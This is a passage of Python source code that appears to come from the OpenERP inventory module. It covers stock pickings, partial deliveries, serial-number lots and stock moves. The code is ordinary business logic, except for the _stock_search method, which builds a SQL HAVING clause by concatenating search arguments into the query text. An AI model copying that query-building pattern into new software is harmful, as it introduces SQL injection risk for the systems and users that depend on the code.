self._invoice_line_hook(cr, uid, move_line, invoice_line_id)
invoice_obj.button_compute(cr, uid, [invoice_id], context=context,
set_total=(inv_type in ('in_invoice', 'in_refund')))
self.write(cr, uid, [picking.id], {
'invoice_state': 'invoiced',
}, context=context)
self._invoice_hook(cr, uid, picking, invoice_id)
self.write(cr, uid, res.keys(), {
'invoice_state': 'invoiced',
}, context=context)
return res
def test_done(self, cr, uid, ids, context=None):
""" Test whether the move lines are done or not.
@return: True or False
"""
ok = False
for pick in self.browse(cr, uid, ids, context=context):
if not pick.move_lines:
return True
for move in pick.move_lines:
if move.state not in ('cancel','done'):
return False
if move.state=='done':
ok = True
return ok
def test_cancel(self, cr, uid, ids, context=None):
""" Test whether the move lines are canceled or not.
@return: True or False
"""
for pick in self.browse(cr, uid, ids, context=context):
for move in pick.move_lines:
if move.state not in ('cancel',):
return False
return True
def allow_cancel(self, cr, uid, ids, context=None):
for pick in self.browse(cr, uid, ids, context=context):
if not pick.move_lines:
return True
for move in pick.move_lines:
if move.state == 'done':
raise osv.except_osv(_('Error!'), _('You cannot cancel the picking as some moves have been done. You should cancel the picking lines.'))
return True
def unlink(self, cr, uid, ids, context=None):
move_obj = self.pool.get('stock.move')
if context is None:
context = {}
for pick in self.browse(cr, uid, ids, context=context):
if pick.state in ['done','cancel']:
# retrieve the string value of field in user's language
state = dict(self.fields_get(cr, uid, context=context)['state']['selection']).get(pick.state, pick.state)
raise osv.except_osv(_('Error!'), _('You cannot remove the picking which is in %s state!')%(state,))
else:
ids2 = [move.id for move in pick.move_lines]
ctx = context.copy()
ctx.update({'call_unlink':True})
if pick.state != 'draft':
#Cancelling the move in order to affect Virtual stock of product
move_obj.action_cancel(cr, uid, ids2, ctx)
#Removing the move
move_obj.unlink(cr, uid, ids2, ctx)
return super(stock_picking, self).unlink(cr, uid, ids, context=context)
# FIXME: needs refactoring, this code is partially duplicated in stock_move.do_partial()!
def do_partial(self, cr, uid, ids, partial_datas, context=None):
""" Makes partial picking and moves done.
@param partial_datas : Dictionary containing details of partial picking
like partner_id, partner_id, delivery_date,
delivery moves with product_id, product_qty, uom
@return: Dictionary of values
"""
if context is None:
context = {}
else:
context = dict(context)
res = {}
move_obj = self.pool.get('stock.move')
uom_obj = self.pool.get('product.uom')
sequence_obj = self.pool.get('ir.sequence')
wf_service = netsvc.LocalService("workflow")
for pick in self.browse(cr, uid, ids, context=context):
new_picking = None
complete, too_many, too_few = [], [], []
move_product_qty, prodlot_ids, product_avail, partial_qty, uos_qty, product_uoms = {}, {}, {}, {}, {}, {}
for move in pick.move_lines:
if move.state in ('done', 'cancel'):
continue
partial_data = partial_datas.get('move%s'%(move.id), {})
product_qty = partial_data.get('product_qty',0.0)
move_product_qty[move.id] = product_qty
product_uom = partial_data.get('product_uom', move.product_uom.id)
product_price = partial_data.get('product_price',0.0)
product_currency = partial_data.get('product_currency',False)
prodlot_id = partial_data.get('prodlot_id')
prodlot_ids[move.id] = prodlot_id
product_uoms[move.id] = product_uom
partial_qty[move.id] = uom_obj._compute_qty(cr, uid, product_uoms[move.id], product_qty, move.product_uom.id)
uos_qty[move.id] = move.product_id._compute_uos_qty(product_uom, product_qty, move.product_uos) if product_qty else 0.0
if move.product_qty == partial_qty[move.id]:
complete.append(move)
elif move.product_qty > partial_qty[move.id]:
too_few.append(move)
else:
too_many.append(move)
if (pick.type == 'in') and (move.product_id.cost_method == 'average'):
# Record the values that were chosen in the wizard, so they can be
# used for average price computation and inventory valuation
move_obj.write(cr, uid, [move.id],
{'price_unit': product_price,
'price_currency_id': product_currency})
# every line of the picking is empty, do not generate anything
empty_picking = not any(q for q in move_product_qty.values() if q > 0)
for move in too_few:
product_qty = move_product_qty[move.id]
if not new_picking and not empty_picking:
new_picking_name = pick.name
self.write(cr, uid, [pick.id],
{'name': sequence_obj.get(cr, uid,
'stock.picking.%s'%(pick.type)),
})
pick.refresh()
new_picking = self.copy(cr, uid, pick.id,
{
'name': new_picking_name,
'move_lines' : [],
'state':'draft',
})
if product_qty != 0:
defaults = {
'product_qty' : product_qty,
'product_uos_qty': uos_qty[move.id],
'picking_id' : new_picking,
'state': 'assigned',
'move_dest_id': False,
'price_unit': move.price_unit,
'product_uom': product_uoms[move.id]
}
prodlot_id = prodlot_ids[move.id]
if prodlot_id:
defaults.update(prodlot_id=prodlot_id)
move_obj.copy(cr, uid, move.id, defaults)
move_obj.write(cr, uid, [move.id],
{
'product_qty': move.product_qty - partial_qty[move.id],
'product_uos_qty': move.product_uos_qty - uos_qty[move.id],
'prodlot_id': False,
'tracking_id': False,
})
if new_picking:
move_obj.write(cr, uid, [c.id for c in complete], {'picking_id': new_picking})
for move in complete:
defaults = {'product_uom': product_uoms[move.id], 'product_qty': move_product_qty[move.id]}
if prodlot_ids.get(move.id):
defaults.update({'prodlot_id': prodlot_ids[move.id]})
move_obj.write(cr, uid, [move.id], defaults)
for move in too_many:
product_qty = move_product_qty[move.id]
defaults = {
'product_qty' : product_qty,
'product_uos_qty': uos_qty[move.id],
'product_uom': product_uoms[move.id]
}
prodlot_id = prodlot_ids.get(move.id)
if prodlot_ids.get(move.id):
defaults.update(prodlot_id=prodlot_id)
if new_picking:
defaults.update(picking_id=new_picking)
move_obj.write(cr, uid, [move.id], defaults)
# At first we confirm the new picking (if necessary)
if new_picking:
wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_confirm', cr)
# Then we finish the good picking
self.write(cr, uid, [pick.id], {'backorder_id': new_picking})
self.action_move(cr, uid, [new_picking], context=context)
wf_service.trg_validate(uid, 'stock.picking', new_picking, 'button_done', cr)
wf_service.trg_write(uid, 'stock.picking', pick.id, cr)
delivered_pack_id = new_picking
self.message_post(cr, uid, new_picking, body=_("Back order <em>%s</em> has been <b>created</b>.") % (pick.name), context=context)
elif empty_picking:
delivered_pack_id = pick.id
else:
self.action_move(cr, uid, [pick.id], context=context)
wf_service.trg_validate(uid, 'stock.picking', pick.id, 'button_done', cr)
delivered_pack_id = pick.id
delivered_pack = self.browse(cr, uid, delivered_pack_id, context=context)
res[pick.id] = {'delivered_picking': delivered_pack.id or False}
return res
# views associated to each picking type
_VIEW_LIST = {
'out': 'view_picking_out_form',
'in': 'view_picking_in_form',
'internal': 'view_picking_form',
}
def _get_view_id(self, cr, uid, type):
"""Get the view id suiting the given type
@param type: the picking type as a string
@return: view i, or False if no view found
"""
res = self.pool.get('ir.model.data').get_object_reference(cr, uid,
'stock', self._VIEW_LIST.get(type, 'view_picking_form'))
return res and res[1] or False
class stock_production_lot(osv.osv):
def name_get(self, cr, uid, ids, context=None):
if not ids:
return []
reads = self.read(cr, uid, ids, ['name', 'prefix', 'ref'], context)
res = []
for record in reads:
name = record['name']
prefix = record['prefix']
if prefix:
name = prefix + '/' + name
if record['ref']:
name = '%s [%s]' % (name, record['ref'])
res.append((record['id'], name))
return res
def name_search(self, cr, uid, name, args=None, operator='ilike', context=None, limit=100):
args = args or []
ids = []
if name:
ids = self.search(cr, uid, [('prefix', '=', name)] + args, limit=limit, context=context)
if not ids:
ids = self.search(cr, uid, [('name', operator, name)] + args, limit=limit, context=context)
else:
ids = self.search(cr, uid, args, limit=limit, context=context)
return self.name_get(cr, uid, ids, context)
_name = 'stock.production.lot'
_description = 'Serial Number'
def _get_stock(self, cr, uid, ids, field_name, arg, context=None):
""" Gets stock of products for locations
@return: Dictionary of values
"""
if context is None:
context = {}
if 'location_id' not in context:
locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')], context=context)
else:
locations = context['location_id'] and [context['location_id']] or []
if isinstance(ids, (int, long)):
ids = [ids]
res = {}.fromkeys(ids, 0.0)
if locations:
cr.execute('''select
prodlot_id,
sum(qty)
from
stock_report_prodlots
where
location_id IN %s and prodlot_id IN %s group by prodlot_id''',(tuple(locations),tuple(ids),))
res.update(dict(cr.fetchall()))
return res
def _stock_search(self, cr, uid, obj, name, args, context=None):
""" Searches Ids of products
@return: Ids of locations
"""
locations = self.pool.get('stock.location').search(cr, uid, [('usage', '=', 'internal')])
cr.execute('''select
prodlot_id,
sum(qty)
from
stock_report_prodlots
where
location_id IN %s group by prodlot_id
having sum(qty) '''+ str(args[0][1]) + str(args[0][2]),(tuple(locations),))
res = cr.fetchall()
ids = [('id', 'in', map(lambda x: x[0], res))]
return ids
_columns = {
'name': fields.char('Serial Number', size=64, required=True, help="Unique Serial Number, will be displayed as: PREFIX/SERIAL [INT_REF]"),
'ref': fields.char('Internal Reference', size=256, help="Internal reference number in case it differs from the manufacturer's serial number"),
'prefix': fields.char('Prefix', size=64, help="Optional prefix to prepend when displaying this serial number: PREFIX/SERIAL [INT_REF]"),
'product_id': fields.many2one('product.product', 'Product', required=True, domain=[('type', '<>', 'service')]),
'date': fields.datetime('Creation Date', required=True),
'stock_available': fields.function(_get_stock, fnct_search=_stock_search, type="float", string="Available", select=True,
help="Current quantity of products with this Serial Number available in company warehouses",
digits_compute=dp.get_precision('Product Unit of Measure')),
'revisions': fields.one2many('stock.production.lot.revision', 'lot_id', 'Revisions'),
'company_id': fields.many2one('res.company', 'Company', select=True),
'move_ids': fields.one2many('stock.move', 'prodlot_id', 'Moves for this serial number', readonly=True),
}
_defaults = {
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'name': lambda x, y, z, c: x.pool.get('ir.sequence').get(y, z, 'stock.lot.serial'),
'product_id': lambda x, y, z, c: c.get('product_id', False),
}
_sql_constraints = [
('name_ref_uniq', 'unique (name, ref, product_id, company_id)', 'The combination of Serial Number, internal reference, Product and Company must be unique !'),
]
def action_traceability(self, cr, uid, ids, context=None):
""" It traces the information of a product
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return: A dictionary of values
"""
value=self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)
return value
def copy(self, cr, uid, id, default=None, context=None):
context = context or {}
default = default and default.copy() or {}
default.update(date=time.strftime('%Y-%m-%d %H:%M:%S'), move_ids=[])
return super(stock_production_lot, self).copy(cr, uid, id, default=default, context=context)
stock_production_lot()
class stock_production_lot_revision(osv.osv):
_name = 'stock.production.lot.revision'
_description = 'Serial Number Revision'
_columns = {
'name': fields.char('Revision Name', size=64, required=True),
'description': fields.text('Description'),
'date': fields.date('Revision Date'),
'indice': fields.char('Revision Number', size=16),
'author_id': fields.many2one('res.users', 'Author'),
'lot_id': fields.many2one('stock.production.lot', 'Serial Number', select=True, ondelete='cascade'),
'company_id': fields.related('lot_id','company_id',type='many2one',relation='res.company',string='Company', store=True, readonly=True),
}
_defaults = {
'author_id': lambda x, y, z, c: z,
'date': fields.date.context_today,
}
stock_production_lot_revision()
# ----------------------------------------------------
# Move
# ----------------------------------------------------
#
# Fields:
# location_dest_id is only used for predicting futur stocks
#
class stock_move(osv.osv):
def _getSSCC(self, cr, uid, context=None):
cr.execute('select id from stock_tracking where create_uid=%s order by id desc limit 1', (uid,))
res = cr.fetchone()
return (res and res[0]) or False
_name = "stock.move"
_description = "Stock Move"
_order = 'date_expected desc, id'
_log_create = False
def action_partial_move(self, cr, uid, ids, context=None):
if context is None: context = {}
if context.get('active_model') != self._name:
context.update(active_ids=ids, active_model=self._name)
partial_id = self.pool.get("stock.partial.move").create(
cr, uid, {}, context=context)
return {
'name':_("Products to Process"),
'view_mode': 'form',
'view_id': False,
'view_type': 'form',
'res_model': 'stock.partial.move',
'res_id': partial_id,
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'new',
'domain': '[]',
'context': context
}
def name_get(self, cr, uid, ids, context=None):
res = []
for line in self.browse(cr, uid, ids, context=context):
name = line.location_id.name+' > '+line.location_dest_id.name
# optional prefixes
if line.product_id.code:
name = line.product_id.code + ': ' + name
if line.picking_id.origin:
name = line.picking_id.origin + '/ ' + name
res.append((line.id, name))
return res
def _check_tracking(self, cr, uid, ids, context=None):
""" Checks if serial number is assigned to stock move or not.
@return: True or False
"""
for move in self.browse(cr, uid, ids, context=context):
if not move.prodlot_id and \
(move.state == 'done' and \
( \
(move.product_id.track_production and move.location_id.usage == 'production') or \
(move.product_id.track_production and move.location_dest_id.usage == 'production') or \
(move.product_id.track_incoming and move.location_id.usage == 'supplier') or \
(move.product_id.track_outgoing and move.location_dest_id.usage == 'customer') or \
(move.product_id.track_incoming and move.location_id.usage == 'inventory') \
)):
return False
return True
def _check_product_lot(self, cr, uid, ids, context=None):
""" Checks whether move is done or not and production lot is assigned to that move.
@return: True or False
"""
for move in self.browse(cr, uid, ids, context=context):
if move.prodlot_id and move.state == 'done' and (move.prodlot_id.product_id.id != move.product_id.id):
return False
return True
_columns = {
'name': fields.char('Description', required=True, select=True),
'priority': fields.selection([('0', 'Not urgent'), ('1', 'Urgent')], 'Priority'),
'create_date': fields.datetime('Creation Date', readonly=True, select=True),
'date': fields.datetime('Date', required=True, select=True, help="Move date: scheduled date until move is done, then date of actual move processing", states={'done': [('readonly', True)]}),
'date_expected': fields.datetime('Scheduled Date', states={'done': [('readonly', True)]},required=True, select=True, help="Scheduled date for the processing of this move"),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True, domain=[('type','<>','service')],states={'done': [('readonly', True)]}),
'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'),
required=True,states={'done': [('readonly', True)]},
help="This is the quantity of products from an inventory "
"point of view. For moves in the state 'done', this is the "
"quantity of products that were actually moved. For other "
"moves, this is the quantity of product that is planned to "
"be moved. Lowering this quantity does not generate a "
"backorder. Changing this quantity on assigned moves affects "
"the product reservation, and should be done with care."
),
'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True,states={'done': [('readonly', True)]}),
'product_uos_qty': fields.float('Quantity (UOS)', digits_compute=dp.get_precision('Product Unit of Measure'), states={'done': [('readonly', True)]}),
'product_uos': fields.many2one('product.uom', 'Product UOS', states={'done': [('readonly', True)]}),
'product_packaging': fields.many2one('product.packaging', 'Packaging', help="It specifies attributes of packaging like type, quantity of packaging,etc."),
'location_id': fields.many2one('stock.location', 'Source Location', required=True, select=True,states={'done': [('readonly', True)]}, help="Sets a location if you produce at a fixed location. This can be a partner location if you subcontract the manufacturing operations."),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True,states={'done': [('readonly', True)]}, select=True, help="Location where the system will stock the finished products."),
'partner_id': fields.many2one('res.partner', 'Destination Address ', states={'done': [('readonly', True)]}, help="Optional address where goods are to be delivered, specifically used for allotment"),
'prodlot_id': fields.many2one('stock.production.lot', 'Serial Number', help="Serial number is used to put a serial number on the production", select=True, ondelete='restrict'),
'tracking_id': fields.many2one('stock.tracking', 'Pack', select=True, states={'done': [('readonly', True)]}, help="Logistical shipping unit: pallet, box, pack ..."),
'auto_validate': fields.boolean('Auto Validate'),
'move_dest_id': fields.many2one('stock.move', 'Destination Move', help="Optional: next stock move when chaining them", select=True),
'move_history_ids': fields.many2many('stock.move', 'stock_move_history_ids', 'parent_id', 'child_id', 'Move History (child moves)'),
'move_history_ids2': fields.many2many('stock.move', 'stock_move_history_ids', 'child_id', 'parent_id', 'Move History (parent moves)'),
'picking_id': fields.many2one('stock.picking', 'Reference', select=True,states={'done': [('readonly', True)]}),
'note': fields.text('Notes'),
'state': fields.selection([('draft', 'New'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Move'),
('confirmed', 'Waiting Availability'),
('assigned', 'Available'),
('done', 'Done'),
], 'Status', readonly=True, select=True,
help= "* New: When the stock move is created and not yet confirmed.\n"\
"* Waiting Another Move: This state can be seen when a move is waiting for another one, for example in a chained flow.\n"\
"* Waiting Availability: This state is reached when the procurement resolution is not straight forward. It may need the scheduler to run, a component to me manufactured...\n"\
"* Available: When products are reserved, it is set to \'Available\'.\n"\
"* Done: When the shipment is processed, the state is \'Done\'."),
'price_unit': fields.float('Unit Price', digits_compute= dp.get_precision('Product Price'), help="Technical field used to record the product cost set by the user during a picking confirmation (when average price costing method is used)"),
'price_currency_id': fields.many2one('res.currency', 'Currency for average price', help="Technical field used to record the currency chosen by the user during a picking confirmation (when average price costing method is used)"),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
'backorder_id': fields.related('picking_id','backorder_id',type='many2one', relation="stock.picking", string="Back Order of", select=True),
'origin': fields.related('picking_id','origin',type='char', size=64, relation="stock.picking", string="Source", store=True),
# used for colors in tree views:
'scrapped': fields.related('location_dest_id','scrap_location',type='boolean',relation='stock.location',string='Scrapped', readonly=True),
'type': fields.related('picking_id', 'type', type='selection', selection=[('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], string='Shipping Type'),
}
def _check_location(self, cr, uid, ids, context=None):
for record in self.browse(cr, uid, ids, context=context):
if (record.state=='done') and (record.location_id.usage == 'view'):
raise osv.except_osv(_('Error'), _('You cannot move product %s from a location of type view %s.')% (record.product_id.name, record.location_id.name))
if (record.state=='done') and (record.location_dest_id.usage == 'view' ):
raise osv.except_osv(_('Error'), _('You cannot move product %s to a location of type view %s.')% (record.product_id.name, record.location_dest_id.name))
return True
_constraints = [
(_check_tracking,
'You must assign a serial number for this product.',
['prodlot_id']),
(_check_location, 'You cannot move products from or to a location of the type view.',
['location_id','location_dest_id']),
(_check_product_lot,
'You try to assign a lot which is not from the same product.',
['prodlot_id'])]
def _default_location_destination(self, cr, uid, context=None):
""" Gets default address of partner for destination location
@return: Address id or False
"""
mod_obj = self.pool.get('ir.model.data')
picking_type = context.get('picking_type')
location_id = False
if context is None:
context = {}
if context.get('move_line', []):
if context['move_line'][0]:
if isinstance(context['move_line'][0], (tuple, list)):
location_id = context['move_line'][0][2] and context['move_line'][0][2].get('location_dest_id',False)
else:
move_list = self.pool.get('stock.move').read(cr, uid, context['move_line'][0], ['location_dest_id'])
location_id = move_list and move_list['location_dest_id'][0] or False
elif context.get('address_out_id', False):
property_out = self.pool.get('res.partner').browse(cr, uid, context['address_out_id'], context).property_stock_customer
location_id = property_out and property_out.id or False
else:
location_xml_id = False
if picking_type in ('in', 'internal'):
location_xml_id = 'stock_location_stock'
elif picking_type == 'out':
location_xml_id = 'stock_location_customers'
if location_xml_id:
try:
location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _default_location_source(self, cr, uid, context=None):
""" Gets default address of partner for source location
@return: Address id or False
"""
mod_obj = self.pool.get('ir.model.data')
picking_type = context.get('picking_type')
location_id = False
if context is None:
context = {}
if context.get('move_line', []):
try:
location_id = context['move_line'][0][2]['location_id']
except:
pass
elif context.get('address_in_id', False):
part_obj_add = self.pool.get('res.partner').browse(cr, uid, context['address_in_id'], context=context)
if part_obj_add:
location_id = part_obj_add.property_stock_supplier.id
else:
location_xml_id = False
if picking_type == 'in':
location_xml_id = 'stock_location_suppliers'
elif picking_type in ('out', 'internal'):
location_xml_id = 'stock_location_stock'
if location_xml_id:
try:
location_model, location_id = mod_obj.get_object_reference(cr, uid, 'stock', location_xml_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
def _default_destination_address(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
return user.company_id.partner_id.id
def _default_move_type(self, cr, uid, context=None):
""" Gets default type of move
@return: type
"""
if context is None:
context = {}
picking_type = context.get('picking_type')
type = 'internal'
if picking_type == 'in':
type = 'in'
elif picking_type == 'out':
type = 'out'
return type
_defaults = {
'location_id': _default_location_source,
'location_dest_id': _default_location_destination,
'partner_id': _default_destination_address,
'type': _default_move_type,
'state': 'draft',
'priority': '1',
'product_qty': 1.0,
'scrapped' : False,
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.move', context=c),
'date_expected': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
}
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
if uid != 1:
frozen_fields = set(['product_qty', 'product_uom', 'product_uos_qty', 'product_uos', 'location_id', 'location_dest_id', 'product_id'])
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
if frozen_fields.intersection(vals):
raise osv.except_osv(_('Operation Forbidden!'),
_('Quantities, Units of Measure, Products and Locations cannot be modified on stock moves that have already been processed (except by the Administrator).'))
return super(stock_move, self).write(cr, uid, ids, vals, context=context)
def copy_data(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
default = default.copy()
default.setdefault('tracking_id', False)
default.setdefault('prodlot_id', False)
default.setdefault('move_history_ids', [])
default.setdefault('move_history_ids2', [])
return super(stock_move, self).copy_data(cr, uid, id, default, context=context)
def _auto_init(self, cursor, context=None):
res = super(stock_move, self)._auto_init(cursor, context=context)
cursor.execute('SELECT indexname \
FROM pg_indexes \
WHERE indexname = \'stock_move_location_id_location_dest_id_product_id_state\'')
if not cursor.fetchone():
cursor.execute('CREATE INDEX stock_move_location_id_location_dest_id_product_id_state \
ON stock_move (product_id, state, location_id, location_dest_id)')
return res
def onchange_lot_id(self, cr, uid, ids, prodlot_id=False, product_qty=False,
loc_id=False, product_id=False, uom_id=False, context=None):
""" On change of production lot gives a warning message.
@param prodlot_id: Changed production lot id
@param product_qty: Quantity of product
@param loc_id: Location id
@param product_id: Product id
@return: Warning message
"""
if not prodlot_id or not loc_id:
return {}
ctx = context and context.copy() or {}
ctx['location_id'] = loc_id
ctx.update({'raise-exception': True})
uom_obj = self.pool.get('product.uom')
product_obj = self.pool.get('product.product')
product_uom = product_obj.browse(cr, uid, product_id, context=ctx).uom_id
prodlot = self.pool.get('stock.production.lot').browse(cr, uid, prodlot_id, context=ctx)
location = self.pool.get('stock.location').browse(cr, uid, loc_id, context=ctx)
uom = uom_obj.browse(cr, uid, uom_id, context=ctx)
amount_actual = uom_obj._compute_qty_obj(cr, uid, product_uom, prodlot.stock_available, uom, context=ctx)
warning = {}
if (location.usage == 'internal') and (product_qty > (amount_actual or 0.0)):
warning = {
'title': _('Insufficient Stock for Serial Number !'),
'message': _('You are moving %.2f %s but only %.2f %s available for this serial number.') % (product_qty, uom.name, amount_actual, uom.name)
}
return {'warning': warning}
def onchange_quantity(self, cr, uid, ids, product_id, product_qty,
product_uom, product_uos):
""" On change of product quantity finds UoM and UoS quantities
@param product_id: Product id
@param product_qty: Changed Quantity of product
@param product_uom: Unit of measure of product
@param product_uos: Unit of sale of product
@return: Dictionary of values
"""
result = {
'product_uos_qty': 0.00
}
warning = {}
if (not product_id) or (product_qty <=0.0):
result['product_qty'] = 0.0
return {'value': result}
product_obj = self.pool.get('product.product')
uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])
# Warn if the quantity was decreased
if ids:
for move in self.read(cr, uid, ids, ['product_qty']):
if product_qty < move['product_qty']:
warning.update({
'title': _('Information'),
'message': _("By changing this quantity here, you accept the "
"new quantity as complete: OpenERP will not "
"automatically generate a back order.") })
break
if product_uos and product_uom and (product_uom != product_uos):
result['product_uos_qty'] = product_qty * uos_coeff['uos_coeff']
else:
result['product_uos_qty'] = product_qty
return {'value': result, 'warning': warning}
def onchange_uos_quantity(self, cr, uid, ids, product_id, product_uos_qty,
product_uos, product_uom):
""" On change of product quantity finds UoM and UoS quantities
@param product_id: Product id
@param product_uos_qty: Changed UoS Quantity of product
@param product_uom: Unit of measure of product
@param product_uos: Unit of sale of product
@return: Dictionary of values
"""
result = {
'product_qty': 0.00
}
if (not product_id) or (product_uos_qty <=0.0):
result['product_uos_qty'] = 0.0
return {'value': result}
product_obj = self.pool.get('product.product')
uos_coeff = product_obj.read(cr, uid, product_id, ['uos_coeff'])
# No warning if the quantity was decreased to avoid double warnings:
# The clients should call onchange_quantity too anyway
if product_uos and product_uom and (product_uom != product_uos):
result['product_qty'] = product_uos_qty / uos_coeff['uos_coeff']
else:
result['product_qty'] = product_uos_qty
return {'value': result}
def onchange_product_id(self, cr, uid, ids, prod_id=False, loc_id=False,
loc_dest_id=False, partner_id=False):
""" On change of product id, if finds UoM, UoS, quantity and UoS quantity.
@param prod_id: Changed Product id
@param loc_id: Source location id
@param loc_dest_id: Destination location id
@param partner_id: Address id of partner
@return: Dictionary of values
"""
if not prod_id:
return {}
user = self.pool.get('res.users').browse(cr, uid, uid)
lang = user and user.lang or False
if partner_id:
addr_rec = self.pool.get('res.partner').browse(cr, uid, partner_id)
if addr_rec:
lang = addr_rec and addr_rec.lang or False
ctx = {'lang': lang}
product = self.pool.get('product.product').browse(cr, uid, [prod_id], context=ctx)[0]
uos_id = product.uos_id and product.uos_id.id or False
result = {
'name': product.partner_ref,
'product_uom': product.uom_id.id,
'product_uos': uos_id,
'product_qty': 1.00,
'product_uos_qty' : self.pool.get('stock.move').onchange_quantity(cr, uid, ids, prod_id, 1.00, product.uom_id.id, uos_id)['value']['product_uos_qty'],
'prodlot_id' : False,
}
if loc_id:
result['location_id'] = loc_id
if loc_dest_id:
result['location_dest_id'] = loc_dest_id
return {'value': result}
def onchange_move_type(self, cr, uid, ids, type, context=None):
""" On change of move type gives sorce and destination location.
@param type: Move Type
@return: Dictionary of values
"""
mod_obj = self.pool.get('ir.model.data')
location_source_id = 'stock_location_stock'
location_dest_id = 'stock_location_stock'
if type == 'in':
location_source_id = 'stock_location_suppliers'
location_dest_id = 'stock_location_stock'
elif type == 'out':
location_source_id = 'stock_location_stock'
location_dest_id = 'stock_location_customers'
try:
source_location = mod_obj.get_object_reference(cr, uid, 'stock', location_source_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [source_location[1]], 'read', context=context)
except (orm.except_orm, ValueError):
source_location = False
try:
dest_location = mod_obj.get_object_reference(cr, uid, 'stock', location_dest_id)
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [dest_location[1]], 'read', context=context)
except (orm.except_orm, ValueError):
dest_location = False
return {'value':{'location_id': source_location and source_location[1] or False, 'location_dest_id': dest_location and dest_location[1] or False}}
def onchange_date(self, cr, uid, ids, date, date_expected, context=None):
""" On change of Scheduled Date gives a Move date.
@param date_expected: Scheduled Date
@param date: Move Date
@return: Move Date
"""
if not date_expected:
date_expected = time.strftime('%Y-%m-%d %H:%M:%S')
return {'value':{'date': date_expected}}
def _chain_compute(self, cr, uid, moves, context=None):
""" Finds whether the location has chained location type or not.
@param moves: Stock moves
@return: Dictionary containing destination location with chained location type.
"""
result = {}
for m in moves:
dest = self.pool.get('stock.location').chained_location_get(
cr,
uid,
m.location_dest_id,
m.picking_id and m.picking_id.partner_id and m.picking_id.partner_id,
m.product_id,
context
)
if dest:
if dest[1] == 'transparent':
newdate = (datetime.strptime(m.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=dest[2] or 0)).strftime('%Y-%m-%d')
self.write(cr, uid, [m.id], {
'date': newdate,
'location_dest_id': dest[0].id})
if m.picking_id and (dest[3] or dest[5]):
self.pool.get('stock.picking').write(cr, uid, [m.picking_id.id], {
'stock_journal_id': dest[3] or m.picking_id.stock_journal_id.id,
'type': dest[5] or m.picking_id.type
}, context=context)
m.location_dest_id = dest[0]
res2 = self._chain_compute(cr, uid, [m], context=context)
for pick_id in res2.keys():
result.setdefault(pick_id, [])
result[pick_id] += res2[pick_id]
else:
result.setdefault(m.picking_id, [])
result[m.picking_id].append( (m, dest) )
return result
def _prepare_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
"""Prepare the definition (values) to create a new chained picking.
:param str picking_name: desired new picking name
:param browse_record picking: source picking (being chained to)
:param str picking_type: desired new picking type
:param list moves_todo: specification of the stock moves to be later included in this
picking, in the form::
[[move, (dest_location, auto_packing, chained_delay, chained_journal,
chained_company_id, chained_picking_type)],
...
]
See also :meth:`stock_location.chained_location_get`.
"""
res_company = self.pool.get('res.company')
return {
'name': picking_name,
'origin': tools.ustr(picking.origin or ''),
'type': picking_type,
'note': picking.note,
'move_type': picking.move_type,
'auto_picking': moves_todo[0][1][1] == 'auto',
'stock_journal_id': moves_todo[0][1][3],
'company_id': moves_todo[0][1][4] or res_company._company_default_get(cr, uid, 'stock.company', context=context),
'partner_id': picking.partner_id.id,
'invoice_state': 'none',
'date': picking.date,
}
def _create_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
picking_obj = self.pool.get('stock.picking')
return picking_obj.create(cr, uid, self._prepare_chained_picking(cr, uid, picking_name, picking, picking_type, moves_todo, context=context))
def create_chained_picking(self, cr, uid, moves, context=None):
res_obj = self.pool.get('res.company')
location_obj = self.pool.get('stock.location')
move_obj = self.pool.get('stock.move')
wf_service = netsvc.LocalService("workflow")
new_moves = []
if context is None:
context = {}
seq_obj = self.pool.get('ir.sequence')
for picking, chained_moves in self._chain_compute(cr, uid, moves, context=context).items():
# We group the moves by automatic move type, so it creates different pickings for different types
moves_by_type = {}
for move in chained_moves:
moves_by_type.setdefault(move[1][1], []).append(move)
for todo in moves_by_type.values():
ptype = todo[0][1][5] and todo[0][1][5] or location_obj.picking_type_get(cr, uid, todo[0][0].location_dest_id, todo[0][1][0])
if picking:
# name of new picking according to its type
if ptype == 'internal':
new_pick_name = seq_obj.get(cr, uid,'stock.picking')
else :
new_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + ptype)
pickid = self._create_chained_picking(cr, uid, new_pick_name, picking, ptype, todo, context=context)
# Need to check name of old picking because it always considers picking as "OUT" when created from Sales Order
old_ptype = location_obj.picking_type_get(cr, uid, picking.move_lines[0].location_id, picking.move_lines[0].location_dest_id)
